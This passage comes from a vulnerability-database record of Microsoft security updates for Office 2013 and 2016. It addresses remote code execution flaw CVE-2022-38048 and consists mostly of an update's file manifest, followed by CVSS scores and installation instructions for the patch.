\nmspublogosmall.contrastblack_scale180.png| mspublogosmall.contrast-black_scale-180.png| | 1859| 14-Sep-22| 01:05 \nmspublogosmall.contrastblack_scale80.png| mspublogosmall.contrast-black_scale-80.png| | 754| 14-Sep-22| 01:05 \nmspublogosmall.contrastwhite_scale100.png| mspublogosmall.contrast-white_scale-100.png| | 1036| 14-Sep-22| 01:05 \nmspublogosmall.contrastwhite_scale140.png| 
mspublogosmall.contrast-white_scale-140.png| | 1300| 14-Sep-22| 01:05 \nmspublogosmall.contrastwhite_scale180.png| mspublogosmall.contrast-white_scale-180.png| | 1868| 14-Sep-22| 01:05 \nmspublogosmall.contrastwhite_scale80.png| mspublogosmall.contrast-white_scale-80.png| | 749| 14-Sep-22| 01:05 \nmspublogosmall.scale100.png| mspublogosmall.scale-100.png| | 1093| 14-Sep-22| 01:05 \nmspublogosmall.scale140.png| mspublogosmall.scale-140.png| | 1324| 14-Sep-22| 01:05 \nmspublogosmall.scale180.png| mspublogosmall.scale-180.png| | 1797| 14-Sep-22| 01:05 \nmspublogosmall.scale80.png| mspublogosmall.scale-80.png| | 838| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastblack_scale100.png| ocpubmgrlogo.contrast-black_scale-100.png| | 3061| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastblack_scale140.png| ocpubmgrlogo.contrast-black_scale-140.png| | 4800| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastblack_scale180.png| ocpubmgrlogo.contrast-black_scale-180.png| | 6552| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastblack_scale80.png| ocpubmgrlogo.contrast-black_scale-80.png| | 2251| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastwhite_scale100.png| ocpubmgrlogo.contrast-white_scale-100.png| | 3077| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastwhite_scale140.png| ocpubmgrlogo.contrast-white_scale-140.png| | 4736| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastwhite_scale180.png| ocpubmgrlogo.contrast-white_scale-180.png| | 6553| 14-Sep-22| 01:05 \nocpubmgrlogo.contrastwhite_scale80.png| ocpubmgrlogo.contrast-white_scale-80.png| | 2234| 14-Sep-22| 01:05 \nocpubmgrlogo.scale100.png| ocpubmgrlogo.scale-100.png| | 3252| 14-Sep-22| 01:05 \nocpubmgrlogo.scale140.png| ocpubmgrlogo.scale-140.png| | 5038| 14-Sep-22| 01:05 \nocpubmgrlogo.scale180.png| ocpubmgrlogo.scale-180.png| | 6678| 14-Sep-22| 01:05 \nocpubmgrlogo.scale80.png| ocpubmgrlogo.scale-80.png| | 2450| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastblack_scale100.png| ocpubmgrlogosmall.contrast-black_scale-100.png| | 1917| 14-Sep-22| 01:05 
\nocpubmgrlogosmall.contrastblack_scale140.png| ocpubmgrlogosmall.contrast-black_scale-140.png| | 2666| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastblack_scale180.png| ocpubmgrlogosmall.contrast-black_scale-180.png| | 3990| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastblack_scale80.png| ocpubmgrlogosmall.contrast-black_scale-80.png| | 1193| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastwhite_scale100.png| ocpubmgrlogosmall.contrast-white_scale-100.png| | 1859| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastwhite_scale140.png| ocpubmgrlogosmall.contrast-white_scale-140.png| | 2595| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastwhite_scale180.png| ocpubmgrlogosmall.contrast-white_scale-180.png| | 3883| 14-Sep-22| 01:05 \nocpubmgrlogosmall.contrastwhite_scale80.png| ocpubmgrlogosmall.contrast-white_scale-80.png| | 1208| 14-Sep-22| 01:05 \nocpubmgrlogosmall.scale100.png| ocpubmgrlogosmall.scale-100.png| | 2206| 14-Sep-22| 01:05 \nocpubmgrlogosmall.scale140.png| ocpubmgrlogosmall.scale-140.png| | 2935| 14-Sep-22| 01:05 \nocpubmgrlogosmall.scale180.png| ocpubmgrlogosmall.scale-180.png| | 4567| 14-Sep-22| 01:05 \nocpubmgrlogosmall.scale80.png| ocpubmgrlogosmall.scale-80.png| | 1389| 14-Sep-22| 01:05 \nonenotelogo.contrastblack_scale100.png| onenotelogo.contrast-black_scale-100.png| | 1566| 14-Sep-22| 01:05 \nonenotelogo.contrastblack_scale140.png| onenotelogo.contrast-black_scale-140.png| | 2183| 14-Sep-22| 01:05 \nonenotelogo.contrastblack_scale180.png| onenotelogo.contrast-black_scale-180.png| | 3150| 14-Sep-22| 01:05 \nonenotelogo.contrastblack_scale80.png| onenotelogo.contrast-black_scale-80.png| | 1362| 14-Sep-22| 01:05 \nonenotelogo.contrastwhite_scale100.png| onenotelogo.contrast-white_scale-100.png| | 1558| 14-Sep-22| 01:05 \nonenotelogo.contrastwhite_scale140.png| onenotelogo.contrast-white_scale-140.png| | 2171| 14-Sep-22| 01:05 \nonenotelogo.contrastwhite_scale180.png| onenotelogo.contrast-white_scale-180.png| | 3162| 14-Sep-22| 01:05 
\nonenotelogo.contrastwhite_scale80.png| onenotelogo.contrast-white_scale-80.png| | 1345| 14-Sep-22| 01:05 \nonenotelogo.scale100.png| onenotelogo.scale-100.png| | 1636| 14-Sep-22| 01:05 \nonenotelogo.scale140.png| onenotelogo.scale-140.png| | 2268| 14-Sep-22| 01:05 \nonenotelogo.scale180.png| onenotelogo.scale-180.png| | 2945| 14-Sep-22| 01:05 \nonenotelogo.scale80.png| onenotelogo.scale-80.png| | 1398| 14-Sep-22| 01:05 \nonenotelogosmall.contrastblack_scale100.png| onenotelogosmall.contrast-black_scale-100.png| | 1097| 14-Sep-22| 01:05 \nonenotelogosmall.contrastblack_scale140.png| onenotelogosmall.contrast-black_scale-140.png| | 1311| 14-Sep-22| 01:05 \nonenotelogosmall.contrastblack_scale180.png| onenotelogosmall.contrast-black_scale-180.png| | 1803| 14-Sep-22| 01:05 \nonenotelogosmall.contrastblack_scale80.png| onenotelogosmall.contrast-black_scale-80.png| | 711| 14-Sep-22| 01:05 \nonenotelogosmall.contrastwhite_scale100.png| onenotelogosmall.contrast-white_scale-100.png| | 1099| 14-Sep-22| 01:05 \nonenotelogosmall.contrastwhite_scale140.png| onenotelogosmall.contrast-white_scale-140.png| | 1303| 14-Sep-22| 01:05 \nonenotelogosmall.contrastwhite_scale180.png| onenotelogosmall.contrast-white_scale-180.png| | 1808| 14-Sep-22| 01:05 \nonenotelogosmall.contrastwhite_scale80.png| onenotelogosmall.contrast-white_scale-80.png| | 709| 14-Sep-22| 01:05 \nonenotelogosmall.scale100.png| onenotelogosmall.scale-100.png| | 1196| 14-Sep-22| 01:05 \nonenotelogosmall.scale140.png| onenotelogosmall.scale-140.png| | 1388| 14-Sep-22| 01:05 \nonenotelogosmall.scale180.png| onenotelogosmall.scale-180.png| | 1806| 14-Sep-22| 01:05 \nonenotelogosmall.scale80.png| onenotelogosmall.scale-80.png| | 811| 14-Sep-22| 01:05 \nonenotemlogo.contrastblack_scale100.png| onenotemlogo.contrast-black_scale-100.png| | 2922| 14-Sep-22| 01:05 \nonenotemlogo.contrastblack_scale140.png| onenotemlogo.contrast-black_scale-140.png| | 4102| 14-Sep-22| 01:05 \nonenotemlogo.contrastblack_scale180.png| 
onenotemlogo.contrast-black_scale-180.png| | 5917| 14-Sep-22| 01:05 \nonenotemlogo.contrastblack_scale80.png| onenotemlogo.contrast-black_scale-80.png| | 2001| 14-Sep-22| 01:05 \nonenotemlogo.contrastwhite_scale100.png| onenotemlogo.contrast-white_scale-100.png| | 2890| 14-Sep-22| 01:05 \nonenotemlogo.contrastwhite_scale140.png| onenotemlogo.contrast-white_scale-140.png| | 4074| 14-Sep-22| 01:05 \nonenotemlogo.contrastwhite_scale180.png| onenotemlogo.contrast-white_scale-180.png| | 5879| 14-Sep-22| 01:05 \nonenotemlogo.contrastwhite_scale80.png| onenotemlogo.contrast-white_scale-80.png| | 2004| 14-Sep-22| 01:05 \nonenotemlogo.scale100.png| onenotemlogo.scale-100.png| | 3005| 14-Sep-22| 01:05 \nonenotemlogo.scale140.png| onenotemlogo.scale-140.png| | 4287| 14-Sep-22| 01:05 \nonenotemlogo.scale180.png| onenotemlogo.scale-180.png| | 5769| 14-Sep-22| 01:05 \nonenotemlogo.scale80.png| onenotemlogo.scale-80.png| | 2156| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastblack_scale100.png| onenotemlogosmall.contrast-black_scale-100.png| | 1801| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastblack_scale140.png| onenotemlogosmall.contrast-black_scale-140.png| | 2602| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastblack_scale180.png| onenotemlogosmall.contrast-black_scale-180.png| | 3594| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastblack_scale80.png| onenotemlogosmall.contrast-black_scale-80.png| | 1130| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastwhite_scale100.png| onenotemlogosmall.contrast-white_scale-100.png| | 1790| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastwhite_scale140.png| onenotemlogosmall.contrast-white_scale-140.png| | 2583| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastwhite_scale180.png| onenotemlogosmall.contrast-white_scale-180.png| | 3554| 14-Sep-22| 01:05 \nonenotemlogosmall.contrastwhite_scale80.png| onenotemlogosmall.contrast-white_scale-80.png| | 1119| 14-Sep-22| 01:05 \nonenotemlogosmall.scale100.png| onenotemlogosmall.scale-100.png| | 1913| 14-Sep-22| 
01:05 \nonenotemlogosmall.scale140.png| onenotemlogosmall.scale-140.png| | 2718| 14-Sep-22| 01:05 \nonenotemlogosmall.scale180.png| onenotemlogosmall.scale-180.png| | 3598| 14-Sep-22| 01:05 \nonenotemlogosmall.scale80.png| onenotemlogosmall.scale-80.png| | 1234| 14-Sep-22| 01:05 \noutlooklogo.contrastblack_scale100.png| outlooklogo.contrast-black_scale-100.png| | 1929| 14-Sep-22| 01:05 \noutlooklogo.contrastblack_scale140.png| outlooklogo.contrast-black_scale-140.png| | 3091| 14-Sep-22| 01:05 \noutlooklogo.contrastblack_scale180.png| outlooklogo.contrast-black_scale-180.png| | 4084| 14-Sep-22| 01:05 \noutlooklogo.contrastblack_scale80.png| outlooklogo.contrast-black_scale-80.png| | 1574| 14-Sep-22| 01:05 \noutlooklogo.contrastwhite_scale100.png| outlooklogo.contrast-white_scale-100.png| | 1895| 14-Sep-22| 01:05 \noutlooklogo.contrastwhite_scale140.png| outlooklogo.contrast-white_scale-140.png| | 3096| 14-Sep-22| 01:05 \noutlooklogo.contrastwhite_scale180.png| outlooklogo.contrast-white_scale-180.png| | 4096| 14-Sep-22| 01:05 \noutlooklogo.contrastwhite_scale80.png| outlooklogo.contrast-white_scale-80.png| | 1541| 14-Sep-22| 01:05 \noutlooklogo.scale100.png| outlooklogo.scale-100.png| | 2093| 14-Sep-22| 01:05 \noutlooklogo.scale140.png| outlooklogo.scale-140.png| | 3241| 14-Sep-22| 01:05 \noutlooklogo.scale180.png| outlooklogo.scale-180.png| | 4038| 14-Sep-22| 01:05 \noutlooklogo.scale80.png| outlooklogo.scale-80.png| | 1705| 14-Sep-22| 01:05 \noutlooklogosmall.contrastblack_scale100.png| outlooklogosmall.contrast-black_scale-100.png| | 1270| 14-Sep-22| 01:05 \noutlooklogosmall.contrastblack_scale140.png| outlooklogosmall.contrast-black_scale-140.png| | 1597| 14-Sep-22| 01:05 \noutlooklogosmall.contrastblack_scale180.png| outlooklogosmall.contrast-black_scale-180.png| | 2523| 14-Sep-22| 01:05 \noutlooklogosmall.contrastblack_scale80.png| outlooklogosmall.contrast-black_scale-80.png| | 918| 14-Sep-22| 01:05 \noutlooklogosmall.contrastwhite_scale100.png| 
outlooklogosmall.contrast-white_scale-100.png| | 1268| 14-Sep-22| 01:05 \noutlooklogosmall.contrastwhite_scale140.png| outlooklogosmall.contrast-white_scale-140.png| | 1547| 14-Sep-22| 01:05 \noutlooklogosmall.contrastwhite_scale180.png| outlooklogosmall.contrast-white_scale-180.png| | 2449| 14-Sep-22| 01:05 \noutlooklogosmall.contrastwhite_scale80.png| outlooklogosmall.contrast-white_scale-80.png| | 902| 14-Sep-22| 01:05 \noutlooklogosmall.scale100.png| outlooklogosmall.scale-100.png| | 1481| 14-Sep-22| 01:05 \noutlooklogosmall.scale140.png| outlooklogosmall.scale-140.png| | 1838| 14-Sep-22| 01:05 \noutlooklogosmall.scale180.png| outlooklogosmall.scale-180.png| | 2731| 14-Sep-22| 01:05 \noutlooklogosmall.scale80.png| outlooklogosmall.scale-80.png| | 1053| 14-Sep-22| 01:05 \npowerpntlogo.contrastblack_scale100.png| powerpntlogo.contrast-black_scale-100.png| | 1654| 14-Sep-22| 01:05 \npowerpntlogo.contrastblack_scale140.png| powerpntlogo.contrast-black_scale-140.png| | 2314| 14-Sep-22| 01:05 \npowerpntlogo.contrastblack_scale180.png| powerpntlogo.contrast-black_scale-180.png| | 3077| 14-Sep-22| 01:05 \npowerpntlogo.contrastblack_scale80.png| powerpntlogo.contrast-black_scale-80.png| | 1280| 14-Sep-22| 01:05 \npowerpntlogo.contrastwhite_scale100.png| powerpntlogo.contrast-white_scale-100.png| | 1650| 14-Sep-22| 01:05 \npowerpntlogo.contrastwhite_scale140.png| powerpntlogo.contrast-white_scale-140.png| | 2348| 14-Sep-22| 01:05 \npowerpntlogo.contrastwhite_scale180.png| powerpntlogo.contrast-white_scale-180.png| | 3059| 14-Sep-22| 01:05 \npowerpntlogo.contrastwhite_scale80.png| powerpntlogo.contrast-white_scale-80.png| | 1259| 14-Sep-22| 01:05 \npowerpntlogo.scale100.png| powerpntlogo.scale-100.png| | 1721| 14-Sep-22| 01:05 \npowerpntlogo.scale140.png| powerpntlogo.scale-140.png| | 2348| 14-Sep-22| 01:05 \npowerpntlogo.scale180.png| powerpntlogo.scale-180.png| | 3023| 14-Sep-22| 01:05 \npowerpntlogo.scale80.png| powerpntlogo.scale-80.png| | 1354| 14-Sep-22| 01:05 
\npowerpntlogosmall.contrastblack_scale100.png| powerpntlogosmall.contrast-black_scale-100.png| | 1026| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastblack_scale140.png| powerpntlogosmall.contrast-black_scale-140.png| | 1364| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastblack_scale180.png| powerpntlogosmall.contrast-black_scale-180.png| | 1894| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastblack_scale80.png| powerpntlogosmall.contrast-black_scale-80.png| | 746| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale100.png| powerpntlogosmall.contrast-white_scale-100.png| | 1022| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale140.png| powerpntlogosmall.contrast-white_scale-140.png| | 1307| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale180.png| powerpntlogosmall.contrast-white_scale-180.png| | 1874| 14-Sep-22| 01:05 \npowerpntlogosmall.contrastwhite_scale80.png| powerpntlogosmall.contrast-white_scale-80.png| | 758| 14-Sep-22| 01:05 \npowerpntlogosmall.scale100.png| powerpntlogosmall.scale-100.png| | 1154| 14-Sep-22| 01:05 \npowerpntlogosmall.scale140.png| powerpntlogosmall.scale-140.png| | 1438| 14-Sep-22| 01:05 \npowerpntlogosmall.scale180.png| powerpntlogosmall.scale-180.png| | 1896| 14-Sep-22| 01:05 \npowerpntlogosmall.scale80.png| powerpntlogosmall.scale-80.png| | 874| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale100.png| spdesignlogo.contrast-black_scale-100.png| | 1559| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale140.png| spdesignlogo.contrast-black_scale-140.png| | 2383| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale180.png| spdesignlogo.contrast-black_scale-180.png| | 3497| 14-Sep-22| 01:05 \nspdesignlogo.contrastblack_scale80.png| spdesignlogo.contrast-black_scale-80.png| | 1298| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale100.png| spdesignlogo.contrast-white_scale-100.png| | 1548| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale140.png| spdesignlogo.contrast-white_scale-140.png| | 2534| 14-Sep-22| 01:05 
\nspdesignlogo.contrastwhite_scale180.png| spdesignlogo.contrast-white_scale-180.png| | 3725| 14-Sep-22| 01:05 \nspdesignlogo.contrastwhite_scale80.png| spdesignlogo.contrast-white_scale-80.png| | 1298| 14-Sep-22| 01:05 \nspdesignlogo.scale100.png| spdesignlogo.scale-100.png| | 2163| 14-Sep-22| 01:05 \nspdesignlogo.scale140.png| spdesignlogo.scale-140.png| | 3058| 14-Sep-22| 01:05 \nspdesignlogo.scale180.png| spdesignlogo.scale-180.png| | 4614| 14-Sep-22| 01:05 \nspdesignlogo.scale80.png| spdesignlogo.scale-80.png| | 1745| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale100.png| spdesignlogosmall.contrast-black_scale-100.png| | 1008| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale140.png| spdesignlogosmall.contrast-black_scale-140.png| | 1278| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale180.png| spdesignlogosmall.contrast-black_scale-180.png| | 1990| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastblack_scale80.png| spdesignlogosmall.contrast-black_scale-80.png| | 617| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale100.png| spdesignlogosmall.contrast-white_scale-100.png| | 977| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale140.png| spdesignlogosmall.contrast-white_scale-140.png| | 1193| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale180.png| spdesignlogosmall.contrast-white_scale-180.png| | 1876| 14-Sep-22| 01:05 \nspdesignlogosmall.contrastwhite_scale80.png| spdesignlogosmall.contrast-white_scale-80.png| | 602| 14-Sep-22| 01:05 \nspdesignlogosmall.scale100.png| spdesignlogosmall.scale-100.png| | 1546| 14-Sep-22| 01:05 \nspdesignlogosmall.scale140.png| spdesignlogosmall.scale-140.png| | 1910| 14-Sep-22| 01:05 \nspdesignlogosmall.scale180.png| spdesignlogosmall.scale-180.png| | 2614| 14-Sep-22| 01:05 \nspdesignlogosmall.scale80.png| spdesignlogosmall.scale-80.png| | 1003| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale100.png| visiologo.contrast-black_scale-100.png| | 1804| 14-Sep-22| 01:05 
\nvisiologo.contrastblack_scale140.png| visiologo.contrast-black_scale-140.png| | 3195| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale180.png| visiologo.contrast-black_scale-180.png| | 3478| 14-Sep-22| 01:05 \nvisiologo.contrastblack_scale80.png| visiologo.contrast-black_scale-80.png| | 1474| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale100.png| visiologo.contrast-white_scale-100.png| | 1801| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale140.png| visiologo.contrast-white_scale-140.png| | 3254| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale180.png| visiologo.contrast-white_scale-180.png| | 3626| 14-Sep-22| 01:05 \nvisiologo.contrastwhite_scale80.png| visiologo.contrast-white_scale-80.png| | 1447| 14-Sep-22| 01:05 \nvisiologo.scale100.png| visiologo.scale-100.png| | 1872| 14-Sep-22| 01:05 \nvisiologo.scale140.png| visiologo.scale-140.png| | 3262| 14-Sep-22| 01:05 \nvisiologo.scale180.png| visiologo.scale-180.png| | 3403| 14-Sep-22| 01:05 \nvisiologo.scale80.png| visiologo.scale-80.png| | 1526| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale100.png| visiologosmall.contrast-black_scale-100.png| | 1196| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale140.png| visiologosmall.contrast-black_scale-140.png| | 1497| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale180.png| visiologosmall.contrast-black_scale-180.png| | 2675| 14-Sep-22| 01:05 \nvisiologosmall.contrastblack_scale80.png| visiologosmall.contrast-black_scale-80.png| | 848| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale100.png| visiologosmall.contrast-white_scale-100.png| | 1165| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale140.png| visiologosmall.contrast-white_scale-140.png| | 1453| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale180.png| visiologosmall.contrast-white_scale-180.png| | 2618| 14-Sep-22| 01:05 \nvisiologosmall.contrastwhite_scale80.png| visiologosmall.contrast-white_scale-80.png| | 836| 14-Sep-22| 01:05 \nvisiologosmall.scale100.png| 
visiologosmall.scale-100.png| | 1285| 14-Sep-22| 01:05 \nvisiologosmall.scale140.png| visiologosmall.scale-140.png| | 1597| 14-Sep-22| 01:05 \nvisiologosmall.scale180.png| visiologosmall.scale-180.png| | 2722| 14-Sep-22| 01:05 \nvisiologosmall.scale80.png| visiologosmall.scale-80.png| | 960| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale100.png| winprojlogo.contrast-black_scale-100.png| | 1662| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale140.png| winprojlogo.contrast-black_scale-140.png| | 2705| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale180.png| winprojlogo.contrast-black_scale-180.png| | 3391| 14-Sep-22| 01:05 \nwinprojlogo.contrastblack_scale80.png| winprojlogo.contrast-black_scale-80.png| | 1393| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale100.png| winprojlogo.contrast-white_scale-100.png| | 1698| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale140.png| winprojlogo.contrast-white_scale-140.png| | 2737| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale180.png| winprojlogo.contrast-white_scale-180.png| | 3396| 14-Sep-22| 01:05 \nwinprojlogo.contrastwhite_scale80.png| winprojlogo.contrast-white_scale-80.png| | 1392| 14-Sep-22| 01:05 \nwinprojlogo.scale100.png| winprojlogo.scale-100.png| | 1740| 14-Sep-22| 01:05 \nwinprojlogo.scale140.png| winprojlogo.scale-140.png| | 2642| 14-Sep-22| 01:05 \nwinprojlogo.scale180.png| winprojlogo.scale-180.png| | 3257| 14-Sep-22| 01:05 \nwinprojlogo.scale80.png| winprojlogo.scale-80.png| | 1514| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale100.png| winprojlogosmall.contrast-black_scale-100.png| | 1124| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale140.png| winprojlogosmall.contrast-black_scale-140.png| | 1430| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale180.png| winprojlogosmall.contrast-black_scale-180.png| | 2183| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastblack_scale80.png| winprojlogosmall.contrast-black_scale-80.png| | 721| 14-Sep-22| 01:05 
\nwinprojlogosmall.contrastwhite_scale100.png| winprojlogosmall.contrast-white_scale-100.png| | 1119| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale140.png| winprojlogosmall.contrast-white_scale-140.png| | 1380| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale180.png| winprojlogosmall.contrast-white_scale-180.png| | 2148| 14-Sep-22| 01:05 \nwinprojlogosmall.contrastwhite_scale80.png| winprojlogosmall.contrast-white_scale-80.png| | 711| 14-Sep-22| 01:05 \nwinprojlogosmall.scale100.png| winprojlogosmall.scale-100.png| | 1308| 14-Sep-22| 01:05 \nwinprojlogosmall.scale140.png| winprojlogosmall.scale-140.png| | 1461| 14-Sep-22| 01:05 \nwinprojlogosmall.scale180.png| winprojlogosmall.scale-180.png| | 2189| 14-Sep-22| 01:05 \nwinprojlogosmall.scale80.png| winprojlogosmall.scale-80.png| | 855| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale100.png| winwordlogo.contrast-black_scale-100.png| | 1668| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale140.png| winwordlogo.contrast-black_scale-140.png| | 1984| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale180.png| winwordlogo.contrast-black_scale-180.png| | 3061| 14-Sep-22| 01:05 \nwinwordlogo.contrastblack_scale80.png| winwordlogo.contrast-black_scale-80.png| | 1385| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale100.png| winwordlogo.contrast-white_scale-100.png| | 1663| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale140.png| winwordlogo.contrast-white_scale-140.png| | 1979| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale180.png| winwordlogo.contrast-white_scale-180.png| | 3067| 14-Sep-22| 01:05 \nwinwordlogo.contrastwhite_scale80.png| winwordlogo.contrast-white_scale-80.png| | 1386| 14-Sep-22| 01:05 \nwinwordlogo.scale100.png| winwordlogo.scale-100.png| | 1784| 14-Sep-22| 01:05 \nwinwordlogo.scale140.png| winwordlogo.scale-140.png| | 2165| 14-Sep-22| 01:05 \nwinwordlogo.scale180.png| winwordlogo.scale-180.png| | 3187| 14-Sep-22| 01:05 \nwinwordlogo.scale80.png| winwordlogo.scale-80.png| | 1435| 
14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale100.png| winwordlogosmall.contrast-black_scale-100.png| | 1152| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale140.png| winwordlogosmall.contrast-black_scale-140.png| | 1422| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale180.png| winwordlogosmall.contrast-black_scale-180.png| | 1619| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastblack_scale80.png| winwordlogosmall.contrast-black_scale-80.png| | 845| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale100.png| winwordlogosmall.contrast-white_scale-100.png| | 1156| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale140.png| winwordlogosmall.contrast-white_scale-140.png| | 1409| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale180.png| winwordlogosmall.contrast-white_scale-180.png| | 1605| 14-Sep-22| 01:05 \nwinwordlogosmall.contrastwhite_scale80.png| winwordlogosmall.contrast-white_scale-80.png| | 832| 14-Sep-22| 01:05 \nwinwordlogosmall.scale100.png| winwordlogosmall.scale-100.png| | 1219| 14-Sep-22| 01:05 \nwinwordlogosmall.scale140.png| winwordlogosmall.scale-140.png| | 1490| 14-Sep-22| 01:05 \nwinwordlogosmall.scale180.png| winwordlogosmall.scale-180.png| | 1706| 14-Sep-22| 01:05 \nwinwordlogosmall.scale80.png| winwordlogosmall.scale-80.png| | 881| 14-Sep-22| 01:05 \nresources.pri| resources.pri| | 47040| 14-Sep-22| 01:05 \nmso.tpn.txt.arm| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \nmso.tpn.txt.x64| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \nmso.tpn.txt.x86| mso_third_party_notices.txt| | 1814| 14-Sep-22| 01:05 \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2013: October 11, 2022 (KB5002279)", "bulletinFamily": "microsoft", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-11T07:00:00", "id": "KB5002279", "href": "https://support.microsoft.com/en-us/help/5002279", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-13T10:51:43", "description": "None\n## Summary\n\nThis security update resolves a Microsoft Office remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2022-38048](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38048>).\n\n**Note: **To apply this security update, you must have the release version of Microsoft Office 2016 installed on the computer.\n\nBe aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2016. It doesn't apply to the Office 2016 Click-to-Run editions, such as Microsoft Office 365 Home. (See [What version of Office am I using?](<https://support.office.com/article/About-Office-What-version-of-Office-am-I-using-932788B8-A3CE-44BF-BB09-E334518B8B19>))\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5002288>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 5002288 for the 32-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=588dcbf5-5171-408d-aa42-69f68c3d7293>)\n * [Download security update 5002288 for the 64-bit version of Office 2016](<http://www.microsoft.com/download/details.aspx?familyid=a8407b0b-df5f-4378-9d52-b907eee42cf0>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [Deployments - Security Update 